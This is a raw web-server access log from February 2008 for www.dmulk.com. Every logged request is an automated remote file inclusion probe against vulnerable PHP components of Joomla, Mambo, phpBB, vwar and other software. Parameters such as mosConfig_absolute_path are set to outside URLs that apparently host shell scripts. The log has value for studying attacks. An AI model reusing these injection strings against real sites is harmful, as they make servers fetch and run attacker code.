118.45.190.173 - - [08/Feb/2008:09:19:57 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.friluftslivsforening.dk/modules/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
118.45.190.173 - - [08/Feb/2008:09:19:57 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.friluftslivsforening.dk/modules/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
70.169.155.140 - - [08/Feb/2008:09:21:05 -0800] "GET /logs/access_080108.log/joomla/index.php?option=com_restaurante&task=http://www.mta.cl/galeria2/galery.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.169.155.140 - - [08/Feb/2008:09:21:05 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.mta.cl/galeria2/galery.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.45.190.173 - - [08/Feb/2008:09:23:02 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.friluftslivsforening.dk/modules/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
118.45.190.173 - - [08/Feb/2008:09:23:03 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.friluftslivsforening.dk/modules/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
69.94.56.38 - - [08/Feb/2008:09:23:18 -0800] "GET /logs/access_080103.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
69.94.56.38 - - [08/Feb/2008:09:23:18 -0800] "GET //administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
69.94.56.38 - - [08/Feb/2008:09:23:18 -0800] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
72.29.68.22 - - [08/Feb/2008:09:24:08 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.friluftslivsforening.dk/modules/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
72.29.68.22 - - [08/Feb/2008:09:24:08 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.friluftslivsforening.dk/modules/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
208.226.79.133 - - [08/Feb/2008:09:27:22 -0800] "GET /logs/access_080117.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [08/Feb/2008:09:27:23 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [08/Feb/2008:09:27:25 -0800] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.38.50.26 - - [08/Feb/2008:09:29:20 -0800] "GET /logs/access.log/index.php?pag=http://anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.50.26 - - [08/Feb/2008:09:29:20 -0800] "GET /index.php?pag=http://anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.38.50.26 - - [08/Feb/2008:09:29:21 -0800] "GET /logs/index.php?pag=http://anjink.co.cc/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.243.214.11 - - [08/Feb/2008:09:30:07 -0800] "GET /logs/access_080121.log//redaxo/include/pages/community.inc.php?subpage=newsletter&REX[INCLUDE_PATH]=http://rafb.net/p/fJFuoc72.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.243.214.11 - - [08/Feb/2008:09:30:16 -0800] "GET /logs/access.log//redaxo/include/pages/community.inc.php?subpage=newsletter&REX[INCLUDE_PATH]=http://rafb.net/p/fJFuoc72.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.243.214.11 - - [08/Feb/2008:09:30:24 -0800] "GET //redaxo/include/pages/community.inc.php?subpage=newsletter&REX[INCLUDE_PATH]=http://rafb.net/p/fJFuoc72.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.243.214.11 - - [08/Feb/2008:09:30:37 -0800] "GET /logs//redaxo/include/pages/community.inc.php?subpage=newsletter&REX[INCLUDE_PATH]=http://rafb.net/p/fJFuoc72.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.226.79.133 - - [08/Feb/2008:09:31:09 -0800] "GET /logs/access_071229.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [08/Feb/2008:09:32:02 -0800] "GET /logs/access_080117.log/admin/index.php?o=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [08/Feb/2008:09:32:02 -0800] "GET /logs/access_080117.log/admin/index.php?o=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [08/Feb/2008:09:32:02 -0800] "GET /admin/index.php?o=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [08/Feb/2008:09:32:02 -0800] "GET /admin/index.php?o=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [08/Feb/2008:09:32:02 -0800] "GET /logs/admin/index.php?o=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [08/Feb/2008:09:32:03 -0800] "GET /logs/admin/index.php?o=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.29.68.22 - - [08/Feb/2008:09:32:12 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.friluftslivsforening.dk/modules/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
72.29.68.22 - - [08/Feb/2008:09:32:12 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.friluftslivsforening.dk/modules/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
195.234.171.106 - - [08/Feb/2008:09:34:16 -0800] "GET /logs/customer/product.php?xcart_dir=http://autodelen.net//downloads/documenten/documenten.png?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
195.234.171.106 - - [08/Feb/2008:09:34:16 -0800] "GET /customer/product.php?xcart_dir=http://autodelen.net//downloads/documenten/documenten.png?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
208.226.79.133 - - [08/Feb/2008:09:34:39 -0800] "GET /logs/access_071229.log/modules/vwar/admin/admin.php?vwar_root=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [08/Feb/2008:09:34:39 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [08/Feb/2008:09:34:39 -0800] "GET /logs/modules/vwar/admin/admin.php?vwar_root=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [08/Feb/2008:09:35:33 -0800] "GET /logs/access_080130.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [08/Feb/2008:09:35:33 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [08/Feb/2008:09:35:34 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
61.95.201.56 - - [08/Feb/2008:09:35:44 -0800] "GET /index.php?redir=http://www.werkzwo.net/files/testbank.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
200.206.143.90 - - [08/Feb/2008:09:36:33 -0800] "GET /logs/access.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [08/Feb/2008:09:37:24 -0800] "GET /logs/access_080117.log/modules/vwar/admin/admin.php?vwar_root=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [08/Feb/2008:09:37:26 -0800] "GET /logs/access_080117.log/components/com_simpleboard/image_upload.php?sbp=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [08/Feb/2008:09:37:26 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [08/Feb/2008:09:37:45 -0800] "GET /logs/access_071229.log/components/com_simpleboard/image_upload.php?sbp=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.29.68.22 - - [08/Feb/2008:09:38:26 -0800] "GET /logs/interna/tiny_mce/plugins/ibrowser/ibrowser.php?tinyMCE_imglib_include=http://www.friluftslivsforening.dk/modules/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
72.29.68.22 - - [08/Feb/2008:09:38:29 -0800] "GET /interna/tiny_mce/plugins/ibrowser/ibrowser.php?tinyMCE_imglib_include=http://www.friluftslivsforening.dk/modules/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
118.45.190.173 - - [08/Feb/2008:09:38:41 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.friluftslivsforening.dk/modules/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
118.45.190.173 - - [08/Feb/2008:09:38:41 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.friluftslivsforening.dk/modules/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
123.236.218.74 - - [08/Feb/2008:09:38:57 -0800] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.werkzwo.net/files/testbank.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
123.236.218.74 - - [08/Feb/2008:09:38:57 -0800] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.werkzwo.net/files/testbank.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
208.226.79.133 - - [08/Feb/2008:09:39:20 -0800] "GET /logs/access_080117.log/components/com_simpleboard/image_upload.php?sbp=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [08/Feb/2008:09:39:20 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [08/Feb/2008:09:39:20 -0800] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
123.236.218.74 - - [08/Feb/2008:09:39:30 -0800] "GET /logs//phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.werkzwo.net/files/testbank.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
123.236.218.74 - - [08/Feb/2008:09:39:30 -0800] "GET //phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.werkzwo.net/files/testbank.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
208.226.79.133 - - [08/Feb/2008:09:39:40 -0800] "GET /logs/access_071229.log/components/com_simpleboard/image_upload.php?sbp=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.58.184.170 - - [08/Feb/2008:09:40:20 -0800] "GET /admin/vwar.php?vwar_root=http://paginas.terra.com.br/lazer/fatalzin/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
207.58.184.170 - - [08/Feb/2008:09:40:20 -0800] "GET /logs/admin/vwar.php?vwar_root=http://paginas.terra.com.br/lazer/fatalzin/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
208.226.79.133 - - [08/Feb/2008:09:40:23 -0800] "GET /logs/access_080117.log/components/com_simpleboard/image_upload.php?sbp=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [08/Feb/2008:09:40:23 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [08/Feb/2008:09:40:24 -0800] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [08/Feb/2008:09:40:30 -0800] "GET /logs/access_071229.log/components/com_simpleboard/image_upload.php?sbp=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [08/Feb/2008:09:41:02 -0800] "GET /logs/access_080117.log/modules/My_eGallery/public/displayCategory.php?adminpath=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [08/Feb/2008:09:41:02 -0800] "GET /modules/My_eGallery/public/displayCategory.php?adminpath=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [08/Feb/2008:09:41:03 -0800] "GET /logs/modules/My_eGallery/public/displayCategory.php?adminpath=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.234.171.106 - - [08/Feb/2008:09:41:31 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://autodelen.net//downloads/documenten/documenten.png?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
195.234.171.106 - - [08/Feb/2008:09:41:31 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://autodelen.net//downloads/documenten/documenten.png?? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
208.226.79.133 - - [08/Feb/2008:09:42:01 -0800] "GET /logs/access_071229.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [08/Feb/2008:09:42:01 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [08/Feb/2008:09:42:01 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [08/Feb/2008:09:42:11 -0800] "GET /logs/access_080117.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [08/Feb/2008:09:42:18 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.29.73.23 - - [08/Feb/2008:09:42:33 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.werkzwo.net/files/testbank.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
72.29.73.23 - - [08/Feb/2008:09:42:36 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.werkzwo.net/files/testbank.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
74.53.141.194 - - [08/Feb/2008:09:45:39 -0800] "GET /index.php?option=com_serverstat&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
74.53.141.194 - - [08/Feb/2008:09:45:39 -0800] "GET /logs/index.php?option=com_serverstat&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
66.246.218.140 - - [08/Feb/2008:09:47:26 -0800] "GET /logs/access_071230.log//modules/vwar/convert/errors.php?error=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.246.218.140 - - [08/Feb/2008:09:47:27 -0800] "GET //modules/vwar/convert/errors.php?error=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.246.218.140 - - [08/Feb/2008:09:47:27 -0800] "GET /logs//modules/vwar/convert/errors.php?error=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.29.68.22 - - [08/Feb/2008:09:47:43 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.friluftslivsforening.dk/modules/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
72.29.68.22 - - [08/Feb/2008:09:47:43 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.friluftslivsforening.dk/modules/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
208.226.79.133 - - [08/Feb/2008:09:48:03 -0800] "GET /logs/access_080118.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [08/Feb/2008:09:48:03 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.226.79.133 - - [08/Feb/2008:09:48:04 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.150.231.45 - - [08/Feb/2008:09:51:02 -0800] "GET /logs/access_080103.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.150.231.45 - - [08/Feb/2008:09:51:03 -0800] "GET //administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.150.231.45 - - [08/Feb/2008:09:51:03 -0800] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.13.114 - - [08/Feb/2008:09:51:30 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.werkzwo.net/files/testbank.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
74.52.13.114 - - [08/Feb/2008:09:51:31 -0800] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.werkzwo.net/files/testbank.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
72.29.68.22 - - [08/Feb/2008:09:53:04 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.friluftslivsforening.dk/modules/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
72.29.68.22 - - [08/Feb/2008:09:53:05 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.friluftslivsforening.dk/modules/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
201.232.209.51 - - [08/Feb/2008:09:53:10 -0800] "GET /logs/access_080103.log//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.232.209.51 - - [08/Feb/2008:09:53:12 -0800] "GET //administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.232.209.51 - - [08/Feb/2008:09:53:13 -0800] "GET /logs//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.laila.jp/item_pics/d3rf/teste.txt????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.68.22 - - [08/Feb/2008:09:53:14 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.friluftslivsforening.dk/modules/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
72.29.68.22 - - [08/Feb/2008:09:53:14 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.friluftslivsforening.dk/modules/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
208.226.79.133 - - [08/Feb/2008:09:53:49 -0800] "GET /logs/access_071230.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.iljd.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.234.171.106 - - [08/Feb/2008:09:54:50 -0800] "GET /includes/functions.php?phpbb_root_path=http://autodelen.net//downloads/documenten/documenten.png?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
195.234.171.106 - - [08/Feb/2008:09:54:50 -0800] "GET /logs/includes/functions.php?phpbb_root_path=http://autodelen.net//downloads/documenten/documenten.png?? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
118.45.190.173 - - [08/Feb/2008:09:56:26 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.friluftslivsforening.dk/modules/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
118.45.190.173 - - [08/Feb/2008:09:56:26 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.friluftslivsforening.dk/modules/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
69.46.28.103 - - [08/Feb/2008:09:56:58 -0800] "GET /logs/access_080108.log//xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://webcal.promocall.de//tools/pr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
